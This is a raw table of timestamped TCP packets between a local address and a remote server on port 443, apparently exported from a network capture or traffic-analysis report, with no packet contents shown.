                                                Aug 27, 2024 13:05:48.209248066 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.209732056 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.209769964 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.209789991 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.209795952 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.209827900 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.209846020 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.210202932 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.210217953 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.210272074 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.210277081 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.210292101 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.210316896 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.218158007 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.265990973 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.266005039 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.266064882 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.266083956 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.266089916 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.266133070 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.298562050 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.298582077 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.298616886 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.298650980 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.298656940 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.298698902 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.299484968 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.299499035 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.299556971 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.299561977 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.299598932 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.300369024 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.300939083 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.300951958 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.300997972 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.301003933 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.301374912 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.301392078 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.301424026 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.301433086 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.301454067 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.301811934 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.301827908 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.301862001 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.301867962 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.301897049 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.302156925 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.302171946 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.302201986 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.302206039 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.302231073 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.302993059 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.303031921 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.303051949 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.303057909 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.303085089 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.303108931 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.312889099 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.389327049 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.389339924 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.389374971 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.389400005 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.389405966 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.389441013 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.389600992 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.389617920 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.389647961 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.389652014 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.389678001 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.391469955 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.391498089 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.391530991 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.391535997 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.391570091 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.391577959 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.391968966 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.391983032 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.392005920 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.392035961 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.392039061 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.392049074 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.392373085 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.392390013 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.392421007 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.392426014 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.392452955 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.393157959 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.393168926 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.393215895 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.393222094 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.393246889 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.393575907 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.393594027 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.393626928 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.393631935 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.393659115 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.447055101 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.447937012 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.447954893 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.447983980 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.447992086 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.447995901 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.448031902 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.475740910 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.483694077 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.483709097 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.483748913 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.483787060 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.483792067 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.483839989 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.483949900 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.483966112 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.483994961 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.484006882 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.484011889 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.484035969 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.484230042 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.484246969 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.484277964 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.484282017 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.484302044 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.484522104 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.484536886 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.484577894 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.484581947 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.484611034 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.484623909 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.484658957 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.484692097 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.484698057 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.484719992 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.484728098 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.484755039 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.484904051 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.484920025 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.484946966 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.484957933 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.484961987 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.484982967 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.485136032 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.485152006 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.485188961 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.485193968 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.485219955 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.512752056 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.512943983 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.210861921 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.210906029 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.211340904 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.211354017 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.211410046 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.211416006 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.211457968 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.212790012 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.212804079 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.212869883 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.212874889 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.212917089 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.213179111 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.214271069 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.214286089 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.214349985 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.214354038 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.214361906 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.214378119 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.214413881 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.214420080 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.214447975 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.214469910 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.266700983 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.266715050 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.266807079 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.266813993 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.266858101 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.298362017 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.298374891 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.298454046 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.298458099 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.298497915 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.298755884 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.298769951 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.298826933 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.298831940 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.298866987 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.301347017 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.301367998 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.301423073 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.301436901 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.301474094 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.301964045 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.301980019 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.302042007 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.302048922 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.302088022 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.303121090 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.303134918 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.303195953 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.303200960 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.303240061 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.304804087 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.304821014 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.304876089 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.304881096 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.304927111 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.305061102 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.305080891 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.305128098 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.305133104 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.305171013 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.357789040 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.357804060 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.357897997 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.357906103 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.357954025 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.389086962 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.389100075 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.389195919 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.389202118 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.389261961 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.389457941 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.389478922 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.389534950 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.389540911 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.389580965 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.392086983 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.392102957 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.392165899 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.392172098 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.392216921 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.392632008 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.392657995 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.392695904 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.392700911 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.392728090 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.392741919 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.393811941 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.393826008 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.393886089 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.393892050 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.393929958 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.395494938 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.395509005 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.395591021 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.395596981 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.395641088 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.395811081 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.395826101 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.395879984 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.395884037 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.395920992 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.448542118 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.448555946 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.448663950 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.448669910 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.448714018 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.479871035 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.479883909 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.479979992 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.479985952 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.480026960 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.480129004 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.480144024 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.480199099 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.480202913 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.480238914 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.482599974 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.482611895 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.482691050 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.482698917 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.482741117 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.483277082 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.483289003 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.483357906 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.483362913 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.483402967 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.484286070 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.484298944 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.484364986 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.484369993 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.484412909 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.486095905 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.486124039 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.486299992 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.486305952 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.486347914 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.486390114 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.486402988 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.486459970 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.486464024 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.486505032 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.539097071 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.539110899 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.539237022 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.539242029 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.539282084 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.572967052 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.572982073 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.573069096 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.573074102 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.573113918 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.573251963 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.573265076 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.573327065 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.573331118 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.573371887 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.574687958 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.574702024 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.574771881 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.574776888 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.574815989 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.575125933 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.575144053 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.575200081 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.575205088 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.575247049 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.575965881 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.575982094 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.576052904 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.576057911 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.576096058 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.577284098 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.577299118 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.577374935 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.577380896 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.577425003 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.577678919 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.577692032 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.577748060 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.577753067 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.577784061 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.629667997 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.629682064 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.629796982 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.629802942 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.629851103 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.663971901 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.663986921 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.664169073 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.664177895 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.664226055 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.664275885 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.664290905 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:49.664347887 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:49.664352894 CEST4434973352.216.51.233192.168.2.4
